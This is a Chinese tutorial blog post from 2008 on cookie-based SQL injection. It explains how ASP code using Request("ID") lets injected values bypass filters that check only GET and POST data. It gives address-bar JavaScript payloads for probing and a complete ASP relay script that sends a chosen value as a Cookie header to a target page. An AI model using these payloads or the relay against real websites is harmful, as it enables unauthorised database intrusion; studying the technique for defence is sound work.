Cookies注入

2008-05-13T08:58:00

如今,许多网站都添加了防注入系统代码,使得常规的注入语句难以成功注入。通用的防注入系统固然不错,但大部分都忽略了对Cookies的过滤,这就为Cookies注入留下了可乘之机。

一、Cookies注入原理剖析

我们先来探究在何种情况下会出现Cookies注入。如果你熟悉ASP编程,应该知道Request.QueryString(用于GET请求)或Request.Form(用于POST请求),它们用于读取用户发送给WEB服务器的指定键中的值。有时,为了简化代码,我们可能会写成ID = Request("ID"),这种写法虽然简洁,却隐藏着问题。

WEB服务器读取数据时,会先从GET请求中获取数据,若GET中没有对应数据,再从POST请求中获取,最后还会从Cookies中获取。然而,现有的防注入系统通常只检测GET和POST请求中的数据,一旦发现特殊字符(这里指注入字符),就会禁止数据提交,却忽略了对Cookies数据的检测 。这就导致了Cookies注入的可能性。

二、Cookies注入测试方法

那么,如何测试一个网站是否存在Cookies注入问题呢?以下通过示例进行说明(示例地址仅为演示,并非真实地址)。

假设存在这样一个地址:http://*****.2008.***.com/1.asp?id=88 。如果仅输入*****.2008.***.com/1.asp,将无法看到预期数据,因为缺少参数。为了检测是否存在Cookies注入问题(即是否存在Request("XXX")这种格式带来的漏洞),我们可以按以下步骤操作:

  1. 首先,使用IE浏览器输入*****.2008.***.com/1.asp加载网页,由于未输入参数,此时页面显示不正常。
  2. 接着,在地址栏输入框中输入以下代码:

    javascript:alert(document.cookie="id="+escape("88"));

    按下回车键后,会弹出一个对话框,内容为id = 88。然后刷新网页,如果页面能够正常显示,这表明服务端使用了Request("ID")这种格式来收集数据,此时就具备了尝试Cookies注入的条件。

  3. 继续在地址栏输入框中输入:

    javascript:alert(document.cookie="id="+escape("88 and 2=2"));

    刷新页面,如果显示正常,可以继续下一步测试。

  4. 再输入:

    javascript:alert(document.cookie="id="+escape("88 and 3=2"));

    再次刷新页面,如果页面显示不正常,这就意味着存在Cookies注入漏洞。

需要注意的是,如果程序员显式使用Request.QueryStringRequest.Form获取参数,那么就无法利用Cookies绕过防注入系统进行注入,因为服务程序会直接从GET或POST请求中读取数据,Cookies注入也就无从下手 。

三、后记

Cookie注入并非一项新技术,但在某些情况下,它仍然是一种有效的攻击手段。或许在未来的某一天,防注入系统会将Cookies注入检测纳入其中。

当然,上述只是Cookies注入的一种常见思路,实际上Cookies注入还有多种形式,大家可以在此基础上发散思维进行研究。同时也要明白,Cookies注入并非万能,在很多情况下并不适用。

最后,附上一个用于Cookies注入的工具代码,它能够辅助完成Cookies注入过程:

<%
Str = "xxxid="&escape(request("Holmesian"))
Url = "http://*****.2008.***.com/go.asp"
response.write PostData(Url,Str)
Function PostData(PostUrl,PostCok)  
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
      .Open "GET",PostUrl,False
      .SetRequestHeader "Cookie",PostCok
      .Send
        PostData =.ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function
%>

这个工具主要用于转接Cookies注入,通过设置特定的Cookie值并发送请求,帮助攻击者尝试利用可能存在的Cookies注入漏洞。但请务必记住,进行此类测试应在合法授权的环境下进行,以避免违反法律法规。

当前页面是本站的「Baidu MIP」版。发表评论请点击:完整版 »